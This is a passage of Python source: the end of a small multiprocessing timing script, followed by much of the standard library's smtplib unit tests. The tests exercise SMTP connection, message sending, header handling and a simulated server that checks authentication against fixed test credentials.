    Pure CPU work with no I/O, used to measure how well the workload
    parallelizes across processes. Returns None.
    """
    while n > 0:
        n -= 1


def main():
    """Split the countdown across cpu_count processes and print the wall time."""
    print(cpu_count)
    start = time.time()
    processes = []
    for _ in range(cpu_count):
        p = mpr.Process(target=countdown, args=(count // cpu_count,))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
    print(time.time() - start)


# The guard is required for multiprocessing: with the 'spawn' start method
# (default on Windows and macOS) child processes re-import this module, and
# unguarded Process() calls at module level would recurse forever.
if __name__ == "__main__":
    main()
test_smtplib.py | import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import unittest
from test import support, mock_socket
from unittest.mock import Mock
# Fallback host constants; HOST is overwritten below with the value from
# test.support so the suite binds addresses consistently with the test harness.
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
# threading is optional on minimal builds; tests that need it are decorated
# with skipUnless(threading, ...) and are skipped when it is None.
try:
    import threading
except ImportError:
    threading = None
HOST = support.HOST
if sys.platform == 'darwin':
    # select.poll returns a select.POLLHUP at the end of the tests
    # on darwin, so just ignore it
    def handle_expt(self):
        pass
    # Monkey-patch the channel class so the stray POLLHUP cannot abort a run.
    smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
    """Accept a single client on *serv* and push *buf* to it, then shut down.

    *evt* is set once when the listener is up (so the test can connect) and
    set again after the listening socket has been closed.
    """
    serv.listen()
    evt.set()
    try:
        conn, addr = serv.accept()
    except socket.timeout:
        pass
    else:
        # Cap the number of send attempts so a stuck client cannot hang us.
        attempts = 500
        while buf and attempts > 0:
            readable, writable, errored = select.select([], [conn], [])
            if writable:
                nsent = conn.send(buf)
                buf = buf[nsent:]
                attempts -= 1
        conn.close()
    finally:
        serv.close()
        evt.set()
class GeneralTests(unittest.TestCase):
    """Basic SMTP client behaviour, exercised against mock_socket so that no
    real network connection is ever made."""

    def setUp(self):
        # Divert smtplib's socket module to the in-memory mock.
        smtplib.socket = mock_socket
        self.port = 25

    def tearDown(self):
        # Put the real socket module back for other test classes.
        smtplib.socket = socket

    # This method is no longer used but is retained for backward compatibility,
    # so test to make sure it still works.
    def testQuoteData(self):
        teststr = "abc\n.jkl\rfoo\r\n..blue"
        expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
        self.assertEqual(expected, smtplib.quotedata(teststr))

    def testBasic1(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects
        smtp = smtplib.SMTP(HOST, self.port)
        smtp.close()

    def testSourceAddress(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects
        smtp = smtplib.SMTP(HOST, self.port,
                            source_address=('127.0.0.1',19876))
        self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
        smtp.close()

    def testBasic2(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects, include port in host name
        smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
        smtp.close()

    def testLocalHostName(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # check that supplied local_hostname is used
        smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
        self.assertEqual(smtp.local_hostname, "testhost")
        smtp.close()

    def testTimeoutDefault(self):
        mock_socket.reply_with(b"220 Hola mundo")
        self.assertIsNone(mock_socket.getdefaulttimeout())
        # The constructor should pick up the (mocked) global default timeout.
        mock_socket.setdefaulttimeout(30)
        self.assertEqual(mock_socket.getdefaulttimeout(), 30)
        try:
            smtp = smtplib.SMTP(HOST, self.port)
        finally:
            mock_socket.setdefaulttimeout(None)
        self.assertEqual(smtp.sock.gettimeout(), 30)
        smtp.close()

    def testTimeoutNone(self):
        mock_socket.reply_with(b"220 Hola mundo")
        self.assertIsNone(socket.getdefaulttimeout())
        # An explicit timeout=None must override a non-None global default.
        socket.setdefaulttimeout(30)
        try:
            smtp = smtplib.SMTP(HOST, self.port, timeout=None)
        finally:
            socket.setdefaulttimeout(None)
        self.assertIsNone(smtp.sock.gettimeout())
        smtp.close()

    def testTimeoutValue(self):
        mock_socket.reply_with(b"220 Hola mundo")
        smtp = smtplib.SMTP(HOST, self.port, timeout=30)
        self.assertEqual(smtp.sock.gettimeout(), 30)
        smtp.close()

    def test_debuglevel(self):
        mock_socket.reply_with(b"220 Hello world")
        smtp = smtplib.SMTP()
        smtp.set_debuglevel(1)
        with support.captured_stderr() as stderr:
            smtp.connect(HOST, self.port)
        smtp.close()
        # Level 1 prefixes diagnostics with "connect:".
        expected = re.compile(r"^connect:", re.MULTILINE)
        self.assertRegex(stderr.getvalue(), expected)

    def test_debuglevel_2(self):
        mock_socket.reply_with(b"220 Hello world")
        smtp = smtplib.SMTP()
        smtp.set_debuglevel(2)
        with support.captured_stderr() as stderr:
            smtp.connect(HOST, self.port)
        smtp.close()
        # Level 2 additionally timestamps every diagnostic line.
        expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
                              re.MULTILINE)
        self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
    """Run *serv*'s asyncore loop in this thread until the client finishes.

    *serv_evt* is set once at startup (so the test can proceed) and again
    after shutdown; *client_evt* is set by the test to request shutdown.
    """
    serv_evt.set()
    try:
        # Prefer poll() where the platform has it; fall back to select().
        if hasattr(select, 'poll'):
            poll_fun = asyncore.poll2
        else:
            poll_fun = asyncore.poll
        # Bound the number of loop iterations so a wedged client cannot
        # keep this thread alive forever.
        n = 1000
        while asyncore.socket_map and n > 0:
            poll_fun(0.01, asyncore.socket_map)
            # when the client conversation is finished, it will
            # set client_evt, and it's then ok to kill the server
            if client_evt.is_set():
                serv.close()
                break
            n -= 1
    except socket.timeout:
        pass
    finally:
        if not client_evt.is_set():
            # allow some time for the client to read the result
            time.sleep(0.5)
        serv.close()
        asyncore.close_all()
        serv_evt.set()
# Framing lines that smtpd.DebuggingServer prints around each received
# message; the tests reconstruct expected stdout with these.
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
    """End-to-end tests against a real smtpd.DebuggingServer running in a
    background thread.

    The server prints each received message to stdout; setUp redirects
    stdout to a StringIO so tests can compare the captured transcript
    against MSG_BEGIN/MSG_END-framed expectations.
    """

    maxDiff = None

    def setUp(self):
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        # temporarily replace sys.stdout to capture DebuggingServer output
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Capture SMTPChannel debug output
        self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
        smtpd.DEBUGSTREAM = io.StringIO()
        # Pick a random unused port by passing 0 for the port number
        self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
                                          decode_data=True)
        # Keep a note of what port was assigned
        self.port = self.serv.socket.getsockname()[1]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()
        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()

    def tearDown(self):
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        self.thread.join()
        # restore sys.stdout
        sys.stdout = self.old_stdout
        # restore DEBUGSTREAM
        smtpd.DEBUGSTREAM.close()
        smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM

    def testBasic(self):
        # connect
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.quit()

    def testSourceAddress(self):
        # connect
        port = support.find_unused_port()
        try:
            smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
                                timeout=3, source_address=('127.0.0.1', port))
            self.assertEqual(smtp.source_address, ('127.0.0.1', port))
            self.assertEqual(smtp.local_hostname, 'localhost')
            smtp.quit()
        except OSError as e:
            # The chosen port may have been taken between find_unused_port
            # and bind; that is an environment problem, not a failure.
            if e.errno == errno.EADDRINUSE:
                self.skipTest("couldn't bind to port %d" % port)
            raise

    def testNOOP(self):
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        expected = (250, b'OK')
        self.assertEqual(smtp.noop(), expected)
        smtp.quit()

    def testRSET(self):
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        expected = (250, b'OK')
        self.assertEqual(smtp.rset(), expected)
        smtp.quit()

    def testELHO(self):
        # EHLO isn't implemented in DebuggingServer
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        expected = (250, b'\nSIZE 33554432\nHELP')
        self.assertEqual(smtp.ehlo(), expected)
        smtp.quit()

    def testEXPNNotImplemented(self):
        # EXPN isn't implemented in DebuggingServer
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        expected = (502, b'EXPN not implemented')
        smtp.putcmd('EXPN')
        self.assertEqual(smtp.getreply(), expected)
        smtp.quit()

    def testVRFY(self):
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        expected = (252, b'Cannot VRFY user, but will accept message ' + \
                         b'and attempt delivery')
        self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
        self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
        smtp.quit()

    def testSecondHELO(self):
        # check that a second HELO returns a message that it's a duplicate
        # (this behavior is specific to smtpd.SMTPChannel)
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.helo()
        expected = (503, b'Duplicate HELO/EHLO')
        self.assertEqual(smtp.helo(), expected)
        smtp.quit()

    def testHELP(self):
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
                                      b'RCPT DATA RSET NOOP QUIT VRFY')
        smtp.quit()

    def testSend(self):
        # connect and send mail
        m = 'A test message'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.sendmail('John', 'Sally', m)
        # XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
        # in asyncore. This sleep might help, but should really be fixed
        # properly by using an Event variable.
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)

    def testSendBinary(self):
        m = b'A test message'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.sendmail('John', 'Sally', m)
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)

    def testSendNeedingDotQuote(self):
        # Issue 12283
        m = '.A test\n.mes.sage.'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.sendmail('John', 'Sally', m)
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)

    def testSendNullSender(self):
        m = 'A test message'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.sendmail('<>', 'Sally', m)
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)
        # The null sender must survive to the server's debug log verbatim.
        debugout = smtpd.DEBUGSTREAM.getvalue()
        sender = re.compile("^sender: <>$", re.MULTILINE)
        self.assertRegex(debugout, sender)

    def testSendMessage(self):
        m = email.mime.text.MIMEText('A test message')
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.send_message(m, from_addr='John', to_addrs='Sally')
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        # Add the X-Peer header that DebuggingServer adds
        m['X-Peer'] = socket.gethostbyname('localhost')
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)

    def testSendMessageWithAddresses(self):
        m = email.mime.text.MIMEText('A test message')
        m['From'] = 'foo@bar.com'
        m['To'] = 'John'
        m['CC'] = 'Sally, Fred'
        m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.send_message(m)
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        # make sure the Bcc header is still in the message.
        self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
                                   '<warped@silly.walks.com>')
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        # Add the X-Peer header that DebuggingServer adds
        m['X-Peer'] = socket.gethostbyname('localhost')
        # The Bcc header should not be transmitted.
        del m['Bcc']
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)
        debugout = smtpd.DEBUGSTREAM.getvalue()
        sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
        self.assertRegex(debugout, sender)
        # All To/CC/Bcc addresses must appear in the recipient list.
        for addr in ('John', 'Sally', 'Fred', 'root@localhost',
                     'warped@silly.walks.com'):
            to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                                 re.MULTILINE)
            self.assertRegex(debugout, to_addr)

    def testSendMessageWithSomeAddresses(self):
        # Make sure nothing breaks if not all of the three 'to' headers exist
        m = email.mime.text.MIMEText('A test message')
        m['From'] = 'foo@bar.com'
        m['To'] = 'John, Dinsdale'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.send_message(m)
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        # Add the X-Peer header that DebuggingServer adds
        m['X-Peer'] = socket.gethostbyname('localhost')
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)
        debugout = smtpd.DEBUGSTREAM.getvalue()
        sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
        self.assertRegex(debugout, sender)
        for addr in ('John', 'Dinsdale'):
            to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                                 re.MULTILINE)
            self.assertRegex(debugout, to_addr)

    def testSendMessageWithSpecifiedAddresses(self):
        # Make sure addresses specified in call override those in message.
        m = email.mime.text.MIMEText('A test message')
        m['From'] = 'foo@bar.com'
        m['To'] = 'John, Dinsdale'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        # Add the X-Peer header that DebuggingServer adds
        m['X-Peer'] = socket.gethostbyname('localhost')
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)
        debugout = smtpd.DEBUGSTREAM.getvalue()
        sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
        self.assertRegex(debugout, sender)
        # Header addresses must NOT have been used as recipients.
        for addr in ('John', 'Dinsdale'):
            to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                                 re.MULTILINE)
            self.assertNotRegex(debugout, to_addr)
        recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
        self.assertRegex(debugout, recip)

    def testSendMessageWithMultipleFrom(self):
        # Sender overrides To
        m = email.mime.text.MIMEText('A test message')
        m['From'] = 'Bernard, Bianca'
        m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
        m['To'] = 'John, Dinsdale'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.send_message(m)
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        # Add the X-Peer header that DebuggingServer adds
        m['X-Peer'] = socket.gethostbyname('localhost')
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)
        debugout = smtpd.DEBUGSTREAM.getvalue()
        sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
        self.assertRegex(debugout, sender)
        for addr in ('John', 'Dinsdale'):
            to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                                 re.MULTILINE)
            self.assertRegex(debugout, to_addr)

    def testSendMessageResent(self):
        # Resent-* headers take precedence over the originals when present.
        m = email.mime.text.MIMEText('A test message')
        m['From'] = 'foo@bar.com'
        m['To'] = 'John'
        m['CC'] = 'Sally, Fred'
        m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
        m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
        m['Resent-From'] = 'holy@grail.net'
        m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
        m['Resent-Bcc'] = 'doe@losthope.net'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        smtp.send_message(m)
        # XXX (see comment in testSend)
        time.sleep(0.01)
        smtp.quit()
        self.client_evt.set()
        self.serv_evt.wait()
        self.output.flush()
        # The Resent-Bcc headers are deleted before serialization.
        del m['Bcc']
        del m['Resent-Bcc']
        # Add the X-Peer header that DebuggingServer adds
        m['X-Peer'] = socket.gethostbyname('localhost')
        mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
        self.assertEqual(self.output.getvalue(), mexpect)
        debugout = smtpd.DEBUGSTREAM.getvalue()
        sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
        self.assertRegex(debugout, sender)
        for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
            to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
                                 re.MULTILINE)
            self.assertRegex(debugout, to_addr)

    def testSendMessageMultipleResentRaises(self):
        # With two Resent- blocks there is no way to know which one is the
        # most recent, so send_message must refuse to guess.
        m = email.mime.text.MIMEText('A test message')
        m['From'] = 'foo@bar.com'
        m['To'] = 'John'
        m['CC'] = 'Sally, Fred'
        m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
        m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
        m['Resent-From'] = 'holy@grail.net'
        m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
        m['Resent-Bcc'] = 'doe@losthope.net'
        m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
        m['Resent-To'] = 'holy@grail.net'
        m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
        with self.assertRaises(ValueError):
            smtp.send_message(m)
        smtp.close()
class NonConnectingTests(unittest.TestCase):
    """SMTP client behaviour that never opens a network connection."""

    def testNotConnected(self):
        # Operations on an unconnected SMTP object should raise; SMTP.send
        # currently trips over the missing 'sock' attribute internally,
        # which smtplib surfaces as SMTPServerDisconnected.
        smtp = smtplib.SMTP()
        with self.assertRaises(smtplib.SMTPServerDisconnected):
            smtp.ehlo()
        with self.assertRaises(smtplib.SMTPServerDisconnected):
            smtp.send('test msg')

    def testNonnumericPort(self):
        # A port that cannot be parsed as an integer raises OSError,
        # whether passed separately or embedded in the host string.
        with self.assertRaises(OSError):
            smtplib.SMTP("localhost", "bogus")
        with self.assertRaises(OSError):
            smtplib.SMTP("localhost:bogus")
class DefaultArgumentsTests(unittest.TestCase):
    """send_message must add the default mail options for an international
    message without mutating a caller-supplied options list."""

    def setUp(self):
        self.msg = EmailMessage()
        # Non-ASCII sender forces the SMTPUTF8 code path.
        self.msg['From'] = 'Páolo <főo@bar.com>'
        self.smtp = smtplib.SMTP()
        # Stub out the wire-level pieces so no socket is ever opened.
        self.smtp.ehlo = Mock(return_value=(200, 'OK'))
        self.smtp.has_extn = Mock()
        self.smtp.sendmail = Mock()

    def _sent_options(self, call_index):
        # Positional argument 3 of sendmail() is the mail_options sequence.
        return self.smtp.sendmail.call_args_list[call_index][0][3]

    def testSendMessage(self):
        expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
        # Send twice to make sure the defaults are not accumulated.
        for _ in range(2):
            self.smtp.send_message(self.msg)
        for call_index in range(2):
            self.assertEqual(self._sent_options(call_index),
                             expected_mail_options)

    def testSendMessageWithMailOptions(self):
        mail_options = ['STARTTLS']
        self.smtp.send_message(self.msg, None, None, mail_options)
        # The caller's list must be left untouched...
        self.assertEqual(mail_options, ['STARTTLS'])
        # ...while the defaults are appended to what actually goes out.
        self.assertEqual(self._sent_options(0),
                         ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME'))
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
    """Client-side handling of a server whose greeting is not a 2xx code."""

    def setUp(self):
        # Route smtplib through the in-memory mock socket and make the
        # simulated server greet with a failure code.
        smtplib.socket = mock_socket
        mock_socket.reply_with(b"199 no hello for you!")
        # Swallow anything the client prints while connecting.
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output
        self.port = 25

    def tearDown(self):
        smtplib.socket = socket
        sys.stdout = self.old_stdout

    def testFailingHELO(self):
        # The constructor connects immediately and must surface the bad
        # greeting as SMTPConnectError.
        with self.assertRaises(smtplib.SMTPConnectError):
            smtplib.SMTP(HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
    """The client must reject a reply line longer than smtplib._MAXLINE."""

    # A syntactically valid greeting that is far past the line-length cap.
    respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'

    def setUp(self):
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(15)
        self.port = support.bind_port(self.sock)
        serving = threading.Thread(
            target=server, args=(self.evt, self.respdata, self.sock))
        serving.start()
        self.addCleanup(serving.join)
        # Wait for the listener to come up, then re-arm the event so
        # tearDown can wait for server shutdown.
        self.evt.wait()
        self.evt.clear()

    def tearDown(self):
        self.evt.wait()
        sys.stdout = self.old_stdout

    def testLineTooLong(self):
        with self.assertRaises(smtplib.SMTPResponseException):
            smtplib.SMTP(HOST, self.port, 'localhost', 3)
# Accounts, credentials and mailing lists recognised by the simulated
# ESMTP server (SimSMTPChannel) below.
sim_users = {'Mr.A@somewhere.com':'John A',
             'Ms.B@xn--fo-fka.com':'Sally B',
             'Mrs.C@somewhereesle.com':'Ruth C',
            }
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
# Fixed base64-encoded server challenge used by the CRAM-MD5 exchange.
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
                          'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
             'list-2':['Ms.B@xn--fo-fka.com',],
            }
# Simulated SMTP channel & server
class ResponseException(Exception):
    """Raised by the simulated channel's auth helpers to abort the exchange;
    carries smtp_code / smtp_error attributes set by the raiser."""
class SimSMTPChannel(smtpd.SMTPChannel):
    """Scriptable ESMTP channel used by SimSMTPServer.

    The *_response class attributes may be set per-test to force a canned
    reply for the corresponding command; ``disconnect`` makes MAIL close
    the connection after replying.  AUTH PLAIN / LOGIN / CRAM-MD5 are
    implemented against the module-level ``sim_auth`` credentials.
    """

    # Canned replies; None means "defer to the real smtpd behaviour".
    quit_response = None
    mail_response = None
    rcpt_response = None
    data_response = None
    # Counters inspected by tests.
    rcpt_count = 0
    rset_count = 0
    disconnect = 0
    AUTH = 99  # Add protocol state to enable auth testing.
    authenticated_user = None

    def __init__(self, extra_features, *args, **kw):
        # Pre-render the extra EHLO feature lines advertised by smtp_EHLO.
        self._extrafeatures = ''.join(
            [ "250-{0}\r\n".format(x) for x in extra_features ])
        super(SimSMTPChannel, self).__init__(*args, **kw)

    # AUTH related stuff. It would be nice if support for this were in smtpd.
    def found_terminator(self):
        # While in the AUTH state, incoming lines are continuation data for
        # the in-progress auth exchange rather than SMTP commands.
        if self.smtp_state == self.AUTH:
            line = self._emptystring.join(self.received_lines)
            print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
            self.received_lines = []
            try:
                self.auth_object(line)
            except ResponseException as e:
                self.smtp_state = self.COMMAND
                self.push('%s %s' % (e.smtp_code, e.smtp_error))
                return
        super().found_terminator()

    def smtp_AUTH(self, arg):
        if not self.seen_greeting:
            self.push('503 Error: send EHLO first')
            return
        if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
            self.push('500 Error: command "AUTH" not recognized')
            return
        if self.authenticated_user is not None:
            self.push(
                '503 Bad sequence of commands: already authenticated')
            return
        args = arg.split()
        if len(args) not in [1, 2]:
            self.push('501 Syntax: AUTH <mechanism> [initial-response]')
            return
        # Dispatch to _auth_<mechanism>, e.g. AUTH CRAM-MD5 -> _auth_cram_md5.
        auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
        try:
            self.auth_object = getattr(self, auth_object_name)
        except AttributeError:
            self.push('504 Command parameter not implemented: unsupported '
                      ' authentication mechanism {!r}'.format(auth_object_name))
            return
        self.smtp_state = self.AUTH
        # An initial response may be supplied on the AUTH line itself.
        self.auth_object(args[1] if len(args) == 2 else None)

    def _authenticated(self, user, valid):
        # Finish the auth exchange and drop back to the COMMAND state.
        if valid:
            self.authenticated_user = user
            self.push('235 Authentication Succeeded')
        else:
            self.push('535 Authentication credentials invalid')
        self.smtp_state = self.COMMAND

    def _decode_base64(self, string):
        return base64.decodebytes(string.encode('ascii')).decode('utf-8')

    def _auth_plain(self, arg=None):
        if arg is None:
            # Empty challenge: ask the client for the initial response.
            self.push('334 ')
        else:
            logpass = self._decode_base64(arg)
            try:
                *_, user, password = logpass.split('\0')
            except ValueError as e:
                self.push('535 Splitting response {!r} into user and password'
                          ' failed: {}'.format(logpass, e))
                return
            self._authenticated(user, password == sim_auth[1])

    def _auth_login(self, arg=None):
        # Two-step exchange: username then password, each base64-encoded.
        if arg is None:
            # base64 encoded 'Username:'
            self.push('334 VXNlcm5hbWU6')
        elif not hasattr(self, '_auth_login_user'):
            self._auth_login_user = self._decode_base64(arg)
            # base64 encoded 'Password:'
            self.push('334 UGFzc3dvcmQ6')
        else:
            password = self._decode_base64(arg)
            self._authenticated(self._auth_login_user, password == sim_auth[1])
            del self._auth_login_user

    def _auth_cram_md5(self, arg=None):
        if arg is None:
            self.push('334 {}'.format(sim_cram_md5_challenge))
        else:
            logpass = self._decode_base64(arg)
            try:
                user, hashed_pass = logpass.split()
            except ValueError as e:
                self.push('535 Splitting response {!r} into user and password'
                          'failed: {}'.format(logpass, e))
                return False
            # Recompute the digest the client should have produced.
            valid_hashed_pass = hmac.HMAC(
                sim_auth[1].encode('ascii'),
                self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
                'md5').hexdigest()
            self._authenticated(user, hashed_pass == valid_hashed_pass)
    # end AUTH related stuff.

    def smtp_EHLO(self, arg):
        # Advertise the fixed feature set plus any per-test extras.
        resp = ('250-testhost\r\n'
                '250-EXPN\r\n'
                '250-SIZE 20000000\r\n'
                '250-STARTTLS\r\n'
                '250-DELIVERBY\r\n')
        resp = resp + self._extrafeatures + '250 HELP'
        self.push(resp)
        self.seen_greeting = arg
        self.extended_smtp = True

    def smtp_VRFY(self, arg):
        # For max compatibility smtplib should be sending the raw address.
        if arg in sim_users:
            self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
        else:
            self.push('550 No such user: %s' % arg)

    def smtp_EXPN(self, arg):
        list_name = arg.lower()
        if list_name in sim_lists:
            user_list = sim_lists[list_name]
            # Multi-line reply: '250-' continuation lines, '250 ' final line.
            for n, user_email in enumerate(user_list):
                quoted_addr = smtplib.quoteaddr(user_email)
                if n < len(user_list) - 1:
                    self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
                else:
                    self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
        else:
            self.push('550 No access for you!')

    def smtp_QUIT(self, arg):
        if self.quit_response is None:
            super(SimSMTPChannel, self).smtp_QUIT(arg)
        else:
            self.push(self.quit_response)
            self.close_when_done()

    def smtp_MAIL(self, arg):
        if self.mail_response is None:
            super().smtp_MAIL(arg)
        else:
